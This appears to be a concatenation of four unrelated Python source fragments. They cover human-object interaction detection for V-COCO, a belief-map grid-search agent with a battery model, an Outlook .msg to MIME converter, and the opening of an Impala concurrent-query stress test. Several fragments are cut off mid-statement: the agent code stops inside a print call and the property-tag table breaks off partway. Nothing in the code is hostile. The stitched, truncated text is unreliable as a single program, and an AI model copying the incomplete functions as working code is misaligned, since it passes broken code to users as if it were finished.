roles = np.stack([roles[:, :, i, :].reshape(-1, num_action_classes * 5) for i in range(num_target_object_types)], axis=-1)
return_dict = dict(
# image_id=i
agents=agents,
roles=roles
)
return return_dict
def target_localization(boxes, human_index, object_index, target_location):
"""
Target localization term in paper, g^a_h,o
Measure compatibility between human-object relative location and
target location, which is predicted by hoi-head
:param boxes:
:param human_index:
:param object_index:
:param target_location:
:return:
"""
human_boxes = boxes[human_index]
object_boxes = boxes[object_index]
num_action_classes = cfg.VCOCO.NUM_ACTION_CLASSES
num_target_object_types = cfg.VCOCO.NUM_TARGET_OBJECT_TYPES
# relative location between every human box and object box
# ToDo: add cfg.MODEL.BBOX_REG_WEIGHTS
relative_location = box_utils.bbox_transform_inv(
np.repeat(human_boxes, object_boxes.shape[0], axis=0),
np.tile(object_boxes, (human_boxes.shape[0], 1))
).reshape(human_boxes.shape[0], object_boxes.shape[0], 4)
# reshape target location same shape as relative location
target_location = target_location.reshape(-1, num_action_classes * num_target_object_types, 4)
# tile to human_num * (num_action_classes * num_target_object_types * object_num) * 4
relative_location, target_location = \
np.tile(relative_location, (1, num_action_classes * num_target_object_types, 1)), \
np.repeat(target_location, relative_location.shape[1], axis=1)
compatibility = np.sum(np.square((relative_location - target_location)), axis=-1)
# It seems the paper make a mistake here
compatibility = np.exp(-compatibility / (2 * cfg.VCOCO.TARGET_SIGMA ** 2))
# reshape to (human_num * num_action_classes * num_target_object_types, object_num)
compatibility = compatibility.reshape(human_index.size * num_action_classes * num_target_object_types,
object_index.size)
return compatibility
# ------------------test interact net code ------------------
# ToDo: will be cleaned
def test_hoi_fill_hoi_blob_from_gt(hoi_blob, entry, im_scale):
"""['boxes', 'human_index', 'target_object_index', 'interaction_human_inds',
'interaction_target_object_inds', 'interaction_batch_idx', 'human_action_labels',
'human_action_targets', 'action_target_weights', 'interaction_action_labels',
'boxes_fpn2', 'boxes_fpn3', 'boxes_fpn4', 'boxes_fpn5', 'boxes_idx_restore_int32',
'human_action_score', 'human_action_bbox_pred', 'interaction_action_score']"""
hoi_blob['boxes'] = np.hstack((np.zeros((entry['boxes'].shape[0], 1), dtype=hoi_blob['boxes'].dtype),
entry['boxes'])) * im_scale
hoi_blob['scores'] = np.ones(entry['boxes'].shape[0])
human_index = np.where(entry['gt_actions'][:, 0] > -1)[0]
# all object could be target object
target_object_index = np.arange(entry['boxes'].shape[0], dtype=human_index.dtype)
interaction_human_inds, interaction_target_object_inds \
= np.repeat(np.arange(human_index.size), target_object_index.size), \
np.tile(np.arange(target_object_index.size), human_index.size)
hoi_blob['human_index'] = human_index
hoi_blob['target_object_index'] = target_object_index
hoi_blob['interaction_human_inds'] = interaction_human_inds
hoi_blob['interaction_target_object_inds'] = interaction_target_object_inds
human_action_score = entry['gt_actions'][human_index]
hoi_blob['human_action_score'] = torch.from_numpy(human_action_score).cuda()
action_label_mat = generate_action_mat(entry['gt_role_id'])
triplet_label = action_label_mat[human_index[interaction_human_inds],
target_object_index[interaction_target_object_inds]]
hoi_blob['interaction_action_score'] = torch.from_numpy(triplet_label).cuda()
human_action_bbox_pred, _ = \
_compute_action_targets(entry['boxes'][human_index], entry['boxes'],
entry['gt_role_id'][human_index])
hoi_blob['human_action_bbox_pred'] = torch.from_numpy(human_action_bbox_pred).cuda()
def generate_action_mat(gt_role_id):
'''
Generate a matrix to store action triplet
:param gt_role_id:
:return: action_mat, row is person id, column is role-object id,
third axis is action id
'''
mat = np.zeros((gt_role_id.shape[0], gt_role_id.shape[0], cfg.VCOCO.NUM_ACTION_CLASSES, gt_role_id.shape[-1]), dtype=np.float32)
obj_ids = gt_role_id[np.where(gt_role_id > -1)]
human_ids, action_cls, role_cls = np.where(gt_role_id > -1)
assert role_cls.size == human_ids.size == action_cls.size == obj_ids.size
mat[human_ids, obj_ids, action_cls, role_cls] = 1
return mat
def _compute_action_targets(person_rois, gt_boxes, role_ids):
'''
Compute action targets
:param person_rois: rois assigned to gt acting-human, n * 4
:param gt_boxes: all gt boxes in one image
:param role_ids: person_rois_num * action_cls_num * num_target_object_types, store person rois corresponding role object ids
:return:
'''
assert person_rois.shape[0] == role_ids.shape[0]
# should use cfg.MODEL.BBOX_REG_WEIGHTS?
# calculate targets between every person rois and every gt_boxes
targets = box_utils.bbox_transform_inv(np.repeat(person_rois, gt_boxes.shape[0], axis=0),
np.tile(gt_boxes, (person_rois.shape[0], 1)),
(1., 1., 1., 1.)).reshape(person_rois.shape[0], gt_boxes.shape[0], -1)
# human action targets is (person_num: 16, action_num: 26, role_cls: 2, relative_location: 4)
# don't use np.inf, so that actions without target_objects could kept
human_action_targets = np.zeros((role_ids.shape[0], role_ids.shape[1],
role_ids.shape[2], 4), dtype=np.float32)
action_target_weights = np.zeros_like(human_action_targets, dtype=np.float32)
# get action targets relative location
human_action_targets[np.where(role_ids > -1)] = \
targets[np.where(role_ids > -1)[0], role_ids[np.where(role_ids > -1)].astype(int)]
action_target_weights[np.where(role_ids > -1)] = 1.
return human_action_targets.reshape(-1, cfg.VCOCO.NUM_ACTION_CLASSES * 2 * 4), \
action_target_weights.reshape(-1, cfg.VCOCO.NUM_ACTION_CLASSES * 2 * 4)
# ------------------------------- | |
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 12 16:04:45 2019
@author: 13383861
"""
import sys
sys.path.append('.')
import os
import time
from abc import ABC, abstractmethod
import numpy as np
from OccupancyGrid.Agents.BaseOccupancyGridAgent import BaseGridAgent
from Utils.Vector3r import Vector3r
from Utils.UE4Grid import UE4Grid
from Utils.BeliefMap import BeliefMapComponent
from Utils.BeliefMapVector import BeliefVectorMultipleSources
from Utils.BatteryDBN import DefaultStochasticBatteryHMM
class SimpleGridAgent(BaseGridAgent):
'''
This agent is responsible for navigating a discrete 2-dimensional grid (assumed to already be mapped) in order to localize
a source of evidence. The agent is equipped with appropriate sensors to carry out this task. This is a very simple instantiation,
the agent does not communicate nor have battery.
'''
def __init__(self, grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents = [], comms_radius = 1000, logged = True):
super().__init__(grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, other_active_agents, comms_radius, logged)
#for simple grid agent assume it is in correct grid square
self.search_terminator = search_terminator
def reset(self):
pass
def _execute_action(self, action):
#This should always be move, recharge incorporated in derived agents
if action[0] == 'move':
#need to implement this, first have agent coordinate with others to check if they are intending to move to current
#grid location
# if action[1] in other_agent_positions:
# #this simulates a lower-level collision avoidence agent instructing
# #robot to not crash into others
# return None
self.previous_pos_intended = self.current_pos_intended
self.current_pos_intended = action[1]
else:
raise Exception("Invalid action requested by {}: {}".format(self.agent_name, action))
# def coord_with_other(self, other_rav_name):
#
# '''
# Coordinate with other rav by requesting their measurement list and sending our own measurement list first write own measurement list to file.
# '''
#
# log_msg_to_file(str(other_rav_name) + ' ' + str(self.timestep), "info", "comms", self._logged)
# self.log_msg_to_cmd("Coordinating with: " + other_rav_name, "debug", "cmd_line", self._logged)
# observations_from_other_agents = self._read_observations(OccupancyGridAgent.ObservationDir + "/{}.csv".format(other_rav_name))
# #update observation manager and also observation file
# for observation_from_other_agent in observations_from_other_agents:
# new_observation = self.observation_manager.update_with_observation(observation_from_other_agent)
# if new_observation:
# #update observations not already observed
# self.log_msg_to_cmd("Updating with observation " + str(new_observation) + " from " + other_rav_name, "debug", "cmd_line",self._logged)
# self.update_observations_file(self.observations_file_loc, new_observation)
# log_msg_to_file(str(observation_from_other_agent), "info", "observations")
#
# self.current_belief_map = create_belief_map_from_observations(self.grid, self.agent_name, self.observation_manager.get_all_observations(), self.current_belief_map.get_prior())
# self.others_coordinated_this_timestep.append(other_rav_name)
def _select_action(self):
return self.move_from_bel_map_callable(self.current_belief_map, self.current_pos_intended, self.explored_grid_locs)
def iterate_next_timestep(self, other_agent_positions = []):
'''
At each discrete timestep, the agent chooses an action to take, executes it and then perceives the environment in which it is operating.
The agent cannot move to a location which another agent is occupying (or is planning to occupy on the same timestep).
'''
#choose an action to perform, sending it to the robot to perform it
self.actuate()
#perceive the new state of the environment using the agents sensor(s)
self.perceive()
#record the sensor measurement in a file
self.record_sensor_measurement()
#update the agents belief
self.update_belief(self.latest_observation)
#coordinate with other agents if possible
#in future implement a coordination strategy
for other_active_agent in self.other_active_agents:
if self.can_coord_with_other(other_active_agent, self.comms_radius):
self.coord_with_other(other_active_agent)
def coord_with_all_others(self):
'''
Attempt to coordinate with all active other agents
'''
for other_active_agent in self.other_active_agents:
if self.can_coord_with_other(other_active_agent, self.comms_radius):
self.coord_with_other(other_active_agent)
def coord_with_other(self, other_active_agent):
'''Requests observations from other active agents and updates this agents belief with the observations
received from other agents'''
#request observations from other agents
other_agent_observations = self.request_other_agent_observations(other_active_agent)
#update current agent belief based on other agents belief
for other_agent_observation in other_agent_observations:
self.update_belief(other_agent_observation)
def find_source(self) -> BeliefMapComponent:
'''
Assuming there is 1 or 0 sources present in the available set of grid locations,
this method instructs the agent to attempt to locate it.
This is done by executing the following sequence of abstract actions:
1). Initialize the belief map given the information the agent is initialized with
2). Choose an action to explore the region using the strategy provided by move_from_bel_map_callable
3). Gather sensor data using a sensor model
4). Update agent belief based on the gathered sensor data
5). Terminate if termination criteria met (based on agent belief) else continue from 2.
This is not suitable for multi-agent simulations, since agents need to coordinate on each time step.
Instead, these steps will need to be executed for each agent externally, which should be easy to do with the
iterate_next_timestep method.
'''
while not self.search_terminator.should_end_search(self.current_belief_map):
if self._end_search_prematurely:
break
#this actuates, perceives, updates belief map in one step
self.iterate_next_timestep()
if self.timestep % 1 == 0:
print("Timestep: {}, Location explored: {}".format(self.timestep, self.current_pos_intended))
#self.current_belief_map.save_visualisation("D:/OccupancyGrid/Data/BeliefMapData/BeliefEvolutionImages/img{:03.0f}.png".format(self.timestep))
#return the most likely component of the belief map. This could be the component that represents the source is not present at all
print(self.current_belief_map.current_belief_vector.get_estimated_state())
print("source located at {}".format(self.current_belief_map.get_ith_most_likely_component(1).grid_loc))
#return self.current_belief_map.get_most_likely_component()
return self.current_belief_map.get_ith_most_likely_component(1)
class MultipleSourceDetectingGridAgent(SimpleGridAgent):
'''
This agent extends the simple grid agent and is designed to locate multiple sources (or possibly none) of evidence located in
a scenario.
'''
def __init__(self, grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents = [], comms_radius = 1000, logged = True):
super().__init__(grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents, comms_radius, logged)
#check that the estimated state can be suitably modified to remove an observed source of evidence
assert issubclass(self.current_belief_map.current_belief_vector.__class__, BeliefVectorMultipleSources)
def reset(self):
pass
def find_sources(self, max_no_sources):
'''
Given an upper limit on the number of sources available in the agent's environment, executes a control loop to locate
the sources, or return a given number of sources as found. This is not suitable for multi-agent simulations, where agents
should coordinate across each timestep.
'''
self.max_no_sources = max_no_sources
#the locations of sources of evidence that have already been successfully located
self.located_sources = []
while len(self.located_sources) < self.max_no_sources:
next_source = self.find_source()
#check if the source is deemed to not be present at all
#if so, break the loop
#This is bad practice - try and fix in future
print("next_source: ", next_source)
if next_source.grid_loc == Vector3r(-1, -1):
break
#given the next located source, append it to the list of located sources and then
#modify the belief vector to set the probability of subsequent sources to be found at
#the given location to be zero.
self.located_sources.append(next_source)
#
self.current_belief_map.mark_source_as_located(next_source.grid_loc)
#return the list of located sources to the user
return self.located_sources
class MultipleSourceDetectingGridAgentWithBattery(MultipleSourceDetectingGridAgent):
'''
This agent extends the simple grid agent and is designed to locate multiple sources (or possibly none) of evidence located in
a scenario. It includes a battery model.
'''
def __init__(self, grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, battery_capacity_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents = [], comms_radius = 1000, logged = True, no_battery_levels = 11, charging_locations = None, operational_speed = 1):
#default number of battery levels is 0-10 = 11 levels
super().__init__(grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents, comms_radius, logged)
#initialize battery model.
self.battery_estimated_state_model = DefaultStochasticBatteryHMM(no_battery_levels)
self.battery_capacity_simulator = battery_capacity_simulator
#use this to terminate simulation if battery drops to 0
self.__prev_battery_readings = []
if not isinstance(charging_locations, list):
self.charging_locations = charging_locations
self.operational_speed = operational_speed
def reset(self):
pass
def terminate_agent(self):
self.end_comms_server()
#ToDo: Edit this to coordinate clocks with other agents. Maybe current agent shouldn't move until timestep is
#equal to other agents?
def _execute_action(self, action):
'''
Updates simulators with action performed. Derived agents would request their physical actuators to carry this out.
'''
#Before agent executes action, maybe it should coordinate with other agents
if action[0] == 'move':
#update battery simulator and battery capacity belief vector as well as receive and update state based on other agent's broadcasts
'''
Updates battery belief based on percept from simulator given that the agent has moved.
in reality, would instruct RAV to move to desired location and sample battery capacity percepts at fixed
intervals. Updates to the battery_capacity hmm would occur independently as each of these percepts is recorded
simulated_sensor_readings = []
'''
#update previous and current positions if the battery is not critical
if self.battery_capacity_simulator.get_current_capacity() <= 0.01:
#this simulates the agents battery failing
print("\n-----------------BATTERY FAILURE - AGENT WILL NOT MOVE ANY MORE-----------------\n")
#end the search prematurely since the agent can't move
self._end_search_prematurely = True
return None
else:
intended_next_position = action[1]
distance_to_travel = self.current_pos_intended.distance_to(intended_next_position)
no_seconds = distance_to_travel / self.operational_speed
no_updates = round(no_seconds)
print("Number of | |
<filename>outlookmsgfile.py
# This module converts a Microsoft Outlook .msg file into
# a MIME message that can be loaded by most email programs
# or inspected in a text editor.
#
# This script relies on the Python package compoundfiles
# for reading the .msg container format.
#
# Referencecs:
#
# https://msdn.microsoft.com/en-us/library/cc463912.aspx
# https://msdn.microsoft.com/en-us/library/cc463900(v=exchg.80).aspx
# https://msdn.microsoft.com/en-us/library/ee157583(v=exchg.80).aspx
# https://blogs.msdn.microsoft.com/openspecification/2009/11/06/msg-file-format-part-1/
import re
import sys
from functools import reduce
import urllib.parse
import email.message, email.parser, email.policy
from email.utils import parsedate_to_datetime, formatdate, formataddr
import compoundfiles
# MAIN FUNCTIONS
def load(filename_or_stream):
with compoundfiles.CompoundFileReader(filename_or_stream) as doc:
doc.rtf_attachments = 0
return load_message_stream(doc.root, True, doc)
def load_message_stream(entry, is_top_level, doc):
# Load stream data.
props = parse_properties(entry['__properties_version1.0'], is_top_level, entry, doc)
# Construct the MIME message....
msg = email.message.EmailMessage()
# Add the raw headers, if known.
if 'TRANSPORT_MESSAGE_HEADERS' in props:
# Get the string holding all of the headers.
headers = props['TRANSPORT_MESSAGE_HEADERS']
if isinstance(headers, bytes):
headers = headers.decode("utf-8")
# Remove content-type header because the body we can get this
# way is just the plain-text portion of the email and whatever
# Content-Type header was in the original is not valid for
# reconstructing it this way.
headers = re.sub("Content-Type: .*(\n\s.*)*\n", "", headers, re.I)
# Parse them.
headers = email.parser.HeaderParser(policy=email.policy.default)\
.parsestr(headers)
# Copy them into the message object.
for header, value in headers.items():
msg[header] = value
else:
# Construct common headers from metadata.
if 'MESSAGE_DELIVERY_TIME' in props:
msg['Date'] = formatdate(props['MESSAGE_DELIVERY_TIME'].timestamp())
del props['MESSAGE_DELIVERY_TIME']
if 'SENDER_NAME' in props:
if 'SENT_REPRESENTING_NAME' in props:
if props['SENT_REPRESENTING_NAME']:
if props['SENDER_NAME'] != props['SENT_REPRESENTING_NAME']:
props['SENDER_NAME'] += " (" + props['SENT_REPRESENTING_NAME'] + ")"
del props['SENT_REPRESENTING_NAME']
if props['SENDER_NAME']:
msg['From'] = formataddr((props['SENDER_NAME'], ""))
del props['SENDER_NAME']
if 'DISPLAY_TO' in props:
if props['DISPLAY_TO']:
msg['To'] = props['DISPLAY_TO']
del props['DISPLAY_TO']
if 'DISPLAY_CC' in props:
if props['DISPLAY_CC']:
msg['CC'] = props['DISPLAY_CC']
del props['DISPLAY_CC']
if 'DISPLAY_BCC' in props:
if props['DISPLAY_BCC']:
msg['BCC'] = props['DISPLAY_BCC']
del props['DISPLAY_BCC']
if 'SUBJECT' in props:
if props['SUBJECT']:
msg['Subject'] = props['SUBJECT']
del props['SUBJECT']
# Add the plain-text body from the BODY field.
if 'BODY' in props:
body = props['BODY']
if isinstance(body, str):
msg.set_content(body, cte='quoted-printable')
else:
msg.set_content(body, maintype="text", subtype="plain", cte='8bit')
# Plain-text is not availabe. Use the rich text version.
else:
doc.rtf_attachments += 1
fn = "messagebody_{}.rtf".format(doc.rtf_attachments)
msg.set_content(
"<no plain text message body --- see attachment {}>".format(fn),
cte='quoted-printable')
# Decompress the value to Rich Text Format.
import compressed_rtf
rtf = props['RTF_COMPRESSED']
rtf = compressed_rtf.decompress(rtf)
# Add RTF file as an attachment.
msg.add_attachment(
rtf,
maintype="text", subtype="rtf",
filename=fn)
# # Copy over string values of remaining properties as headers
# # so we don't lose any information.
# for k, v in props.items():
# if k == 'RTF_COMPRESSED': continue # not interested, save output
# msg[k] = str(v)
# Add attachments.
for stream in entry:
if stream.name.startswith("__attach_version1.0_#"):
process_attachment(msg, stream, doc)
return msg
def process_attachment(msg, entry, doc):
# Load attachment stream.
props = parse_properties(entry['__properties_version1.0'], False, entry, doc)
# The attachment content...
blob = props['ATTACH_DATA_BIN']
# Get the filename and MIME type of the attachment.
filename = props.get("ATTACH_LONG_FILENAME") or props.get("ATTACH_FILENAME") or props.get("DISPLAY_NAME")
if isinstance(filename, bytes): filename = filename.decode("utf8")
mime_type = props.get('ATTACH_MIME_TAG', 'application/octet-stream')
if isinstance(mime_type, bytes): mime_type = mime_type.decode("utf8")
filename = urllib.parse.quote_plus(filename)
# Python 3.6.
if isinstance(blob, str):
msg.add_attachment(
blob,
filename=filename)
elif isinstance(blob, bytes):
msg.add_attachment(
blob,
maintype=mime_type.split("/", 1)[0], subtype=mime_type.split("/", 1)[-1],
filename=filename)
else: # a Message instance
msg.add_attachment(
blob,
filename=filename)
def parse_properties(properties, is_top_level, container, doc):
# Read a properties stream and return a Python dictionary
# of the fields and values, using human-readable field names
# in the mapping at the top of this module.
# Load stream content.
with doc.open(properties) as stream:
stream = stream.read()
# Skip header.
i = (32 if is_top_level else 24)
# Read 16-byte entries.
ret = { }
while i < len(stream):
# Read the entry.
property_type = stream[i+0:i+2]
property_tag = stream[i+2:i+4]
flags = stream[i+4:i+8]
value = stream[i+8:i+16]
i += 16
# Turn the byte strings into numbers and look up the property type.
property_type = property_type[0] + (property_type[1]<<8)
property_tag = property_tag[0] + (property_tag[1]<<8)
if property_tag not in property_tags: continue # should not happen
tag_name, _ = property_tags[property_tag]
tag_type = property_types.get(property_type)
# Fixed Length Properties.
if isinstance(tag_type, FixedLengthValueLoader):
value = tag_type.load(value)
# Variable Length Properties.
elif isinstance(tag_type, VariableLengthValueLoader):
value_length = stream[i+8:i+12] # not used
# Look up the stream in the document that holds the value.
streamname = "__substg1.0_{0:0{1}X}{2:0{3}X}".format(property_tag,4, property_type,4)
try:
with doc.open(container[streamname]) as innerstream:
value = innerstream.read()
except:
# Stream isn't present!
print("stream missing", streamname, file=sys.stderr)
continue
value = tag_type.load(value)
elif isinstance(tag_type, EMBEDDED_MESSAGE):
# Look up the stream in the document that holds the attachment.
streamname = "__substg1.0_{0:0{1}X}{2:0{3}X}".format(property_tag,4, property_type,4)
try:
value = container[streamname]
except:
# Stream isn't present!
print("stream missing", streamname, file=sys.stderr)
continue
value = tag_type.load(value, doc)
else:
# unrecognized type
print("unhandled property type", hex(property_type), file=sys.stderr)
continue
ret[tag_name] = value
return ret
# PROPERTY VALUE LOADERS
class FixedLengthValueLoader(object):
pass
class NULL(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring with unused content.
return None
class BOOLEAN(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding a two-byte integer.
return value[0] == 1
class INTEGER16(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding a two-byte integer.
return reduce(lambda a, b : (a<<8)+b, reversed(value[0:2]))
class INTEGER32(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding a four-byte integer.
return reduce(lambda a, b : (a<<8)+b, reversed(value[0:4]))
class INTEGER64(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring holding an eight-byte integer.
return reduce(lambda a, b : (a<<8)+b, reversed(value))
class INTTIME(FixedLengthValueLoader):
@staticmethod
def load(value):
# value is an eight-byte long bytestring encoding the integer number of
# 100-nanosecond intervals since January 1, 1601.
from datetime import datetime, timedelta
value = reduce(lambda a, b : (a<<8)+b, reversed(value)) # bytestring to integer
value = datetime(1601, 1, 1) + timedelta(seconds=value/10000000)
return value
# TODO: The other fixed-length data types:
# "FLOAT", "DOUBLE", "CURRENCY", "APPTIME", "ERROR"
class VariableLengthValueLoader(object):
pass
class BINARY(VariableLengthValueLoader):
@staticmethod
def load(value):
# value is a bytestring. Just return it.
return value
class STRING8(VariableLengthValueLoader):
@staticmethod
def load(value):
# value is a bytestring. I haven't seen specified what character encoding
# is used when the Unicode storage type is not used, so we'll assume it's
# ASCII or Latin-1 like but we'll use UTF-8 to cover the bases.
return value.decode("utf8")
class UNICODE(VariableLengthValueLoader):
@staticmethod
def load(value):
# value is a bytestring. I haven't seen specified what character encoding
# is used when the Unicode storage type is not used, so we'll assume it's
# ASCII or Latin-1 like but we'll use UTF-8 to cover the bases.
return value.decode("utf16")
# TODO: The other variable-length tag types are "CLSID", "OBJECT".
class EMBEDDED_MESSAGE(object):
@staticmethod
def load(entry, doc):
return load_message_stream(entry, False, doc)
# CONSTANTS
# These constants are defined by the Microsoft Outlook file format
# and identify the data types and data fields in the .msg file.
# from mapidefs.h via https://github.com/inverse-inc/openchange.old/blob/master/libmapi/mapidefs.h
property_types = {
0x1: NULL(),
0x2: INTEGER16(),
0x3: INTEGER32(),
0x4: "FLOAT",
0x5: "DOUBLE",
0x6: "CURRENCY",
0x7: "APPTIME",
0xa: "ERROR",
0xb: BOOLEAN(),
0xd: EMBEDDED_MESSAGE(),
0x14: INTEGER64(),
0x1e: STRING8(),
0x1f: UNICODE(),
0x40: INTTIME(),
0x48: "CLSID",
0xFB: "SVREID",
0xFD: "SRESTRICT",
0xFE: "ACTIONS",
0x102: BINARY(),
}
# from mapitags.h via https://github.com/mvz/email-outlook-message-perl/blob/master/mapitags.h
property_tags = {
0x01: ('ACKNOWLEDGEMENT_MODE', 'I4'),
0x02: ('ALTERNATE_RECIPIENT_ALLOWED', 'BOOLEAN'),
0x03: ('AUTHORIZING_USERS', 'BINARY'),
# Comment on an automatically forwarded message
0x04: ('AUTO_FORWARD_COMMENT', 'STRING'),
# Whether a message has been automatically forwarded
0x05: ('AUTO_FORWARDED', 'BOOLEAN'),
0x06: ('CONTENT_CONFIDENTIALITY_ALGORITHM_ID', 'BINARY'),
0x07: ('CONTENT_CORRELATOR', 'BINARY'),
0x08: ('CONTENT_IDENTIFIER', 'STRING'),
# MIME content length
0x09: ('CONTENT_LENGTH', 'I4'),
0x0A: ('CONTENT_RETURN_REQUESTED', 'BOOLEAN'),
0x0B: ('CONVERSATION_KEY', 'BINARY'),
0x0C: ('CONVERSION_EITS', 'BINARY'),
0x0D: ('CONVERSION_WITH_LOSS_PROHIBITED', 'BOOLEAN'),
0x0E: ('CONVERTED_EITS', 'BINARY'),
# Time to deliver for delayed delivery messages
0x0F: ('DEFERRED_DELIVERY_TIME', 'SYSTIME'),
0x10: ('DELIVER_TIME', 'SYSTIME'),
# Reason a message was discarded
0x11: ('DISCARD_REASON', 'I4'),
0x12: ('DISCLOSURE_OF_RECIPIENTS', 'BOOLEAN'),
0x13: ('DL_EXPANSION_HISTORY', 'BINARY'),
0x14: ('DL_EXPANSION_PROHIBITED', 'BOOLEAN'),
0x15: ('EXPIRY_TIME', 'SYSTIME'),
0x16: ('IMPLICIT_CONVERSION_PROHIBITED', 'BOOLEAN'),
# Message importance
0x17: ('IMPORTANCE', 'I4'),
0x18: ('IPM_ID', 'BINARY'),
0x19: ('LATEST_DELIVERY_TIME', 'SYSTIME'),
0x1A: ('MESSAGE_CLASS', 'STRING'),
0x1B: ('MESSAGE_DELIVERY_ID', 'BINARY'),
0x1E: ('MESSAGE_SECURITY_LABEL', 'BINARY'),
0x1F: ('OBSOLETED_IPMS', 'BINARY'),
# Person a message was originally for
0x20: ('ORIGINALLY_INTENDED_RECIPIENT_NAME', 'BINARY'),
0x21: ('ORIGINAL_EITS', 'BINARY'),
0x22: ('ORIGINATOR_CERTIFICATE', 'BINARY'),
0x23: ('ORIGINATOR_DELIVERY_REPORT_REQUESTED', 'BOOLEAN'),
# Address of the message sender
0x24: ('ORIGINATOR_RETURN_ADDRESS', 'BINARY'),
0x25: ('PARENT_KEY', 'BINARY'),
0x26: ('PRIORITY', 'I4'),
0x27: ('ORIGIN_CHECK', 'BINARY'),
0x28: ('PROOF_OF_SUBMISSION_REQUESTED', 'BOOLEAN'),
# Whether a read receipt is desired
0x29: ('READ_RECEIPT_REQUESTED', 'BOOLEAN'),
| |
<filename>tests/stress/concurrent_select.py<gh_stars>0
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This module is used to stress test Impala by running queries concurrently.
#
# Stress test outline (and notes):
# 1) Get a set of queries as requested by the user from the CLI options.
# 2) For each query, run it individually to find:
# a) Minimum mem limit to avoid spilling
# b) Minimum mem limit to successfully run the query (spilling allowed)
# c) Runtime when no mem was spilled
# d) Runtime when mem was spilled
# e) A row order independent hash of the result set.
# This is a slow process so the results will be written to disk for reuse.
# 3) Find the memory available to Impalad. This will be done by finding the minimum
# memory available across all impalads (-mem_limit startup option). Ideally, for
# maximum stress, all impalads will have the same memory configuration but this is
# not required.
# 4) Optionally, set an amount of memory that can be overcommitted. Overcommitting
# memory can increase memory pressure which can result in memory being spilled to
# disk or queries failing with out-of-memory.
# 5) Start submitting queries. There are two modes for throttling the number of
# concurrent queries, depending on --test-admission-control.
# a) test-admission-control=false: Submit queries until all available memory (as
# determined by items 3 and 4) is used. Before running the query a query mem
# limit is set between 2a and 2b. (There is a runtime option to increase the
# likelihood that a query will be given the full 2a limit to avoid spilling.)
# b) test-admission-control=true: Submit enough queries to achieve the desired
# level of overcommit, but expect that Impala's admission control will throttle
# queries. In this mode mem_limit is not set per query.
# 6) Randomly cancel queries to test cancellation. There is a runtime option to control
# the likelihood that a query will be randomly canceled.
# 7) If a query errored, verify that the error is expected. Errors are expected in the
# following cases:
# a) Memory-based admission control is not being tested (i.e.
# --test-admission-control=false), the error is an out-of-memory error and memory
# on the cluster is overcommitted.
# b) The error is an admission control rejection or timeout.
# 8) Verify the result set hash of successful queries if there are no DML queries in the
# current run.
from __future__ import print_function
import logging
import os
import re
import signal
import sys
import threading
from Queue import Empty # Must be before Queue below
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser, Namespace, SUPPRESS
from collections import defaultdict
from copy import copy
from datetime import datetime
from multiprocessing import Lock, Process, Queue, Value
from random import choice, random, randrange, shuffle
from sys import exit, maxint
from tempfile import gettempdir
from textwrap import dedent
from threading import current_thread
from time import sleep, time
import tests.comparison.cli_options as cli_options
from tests.comparison.cluster import Timeout
from tests.comparison.db_types import Int, TinyInt, SmallInt, BigInt
from tests.stress.mem_broker import MemBroker
from tests.stress.runtime_info import save_runtime_info, load_runtime_info
from tests.stress.queries import (QueryType, generate_compute_stats_queries,
generate_DML_queries, generate_random_queries, load_tpc_queries,
load_queries_from_test_file, estimate_query_mem_mb_usage)
from tests.stress.query_runner import (QueryRunner, QueryTimeout,
NUM_QUERIES_DEQUEUED, NUM_QUERIES_SUBMITTED, NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED,
NUM_QUERIES_FINISHED, NUM_QUERIES_EXCEEDED_MEM_LIMIT, NUM_QUERIES_AC_REJECTED,
NUM_QUERIES_AC_TIMEDOUT, NUM_QUERIES_CANCELLED, NUM_RESULT_MISMATCHES,
NUM_OTHER_ERRORS, RESULT_HASHES_DIR)
from tests.stress.util import create_and_start_daemon_thread, increment, print_stacks
from tests.util.parse_util import (
EXPECTED_TPCDS_QUERIES_COUNT, EXPECTED_TPCH_NESTED_QUERIES_COUNT,
EXPECTED_TPCH_STRESS_QUERIES_COUNT)
LOG = logging.getLogger(os.path.splitext(os.path.basename(__file__))[0])
PROFILES_DIR = "profiles"
class StressArgConverter(object):
def __init__(self, args):
"""
Convert arguments as returned from from argparse parse_args() into internal forms.
The purpose of this object is to do any conversions needed from the type given by
parge_args() into internal forms. For example, if a commandline option takes in a
complicated string that needs to be converted into a list or dictionary, this is the
place to do it. Access works the same as on the object returned by parse_args(),
i.e., object.option_attribute.
In most cases, simple arguments needn't be converted, because argparse handles the
type conversion already, and in most cases, type conversion (e.g., "8" <str> to 8
<int>) is all that's needed. If a property getter below doesn't exist, it means the
argument value is just passed along unconverted.
Params:
args: argparse.Namespace object (from argparse.ArgumentParser().parse_args())
"""
assert isinstance(args, Namespace), "expected Namespace, got " + str(type(args))
self._args = args
self._common_query_options = None
def __getattr__(self, attr):
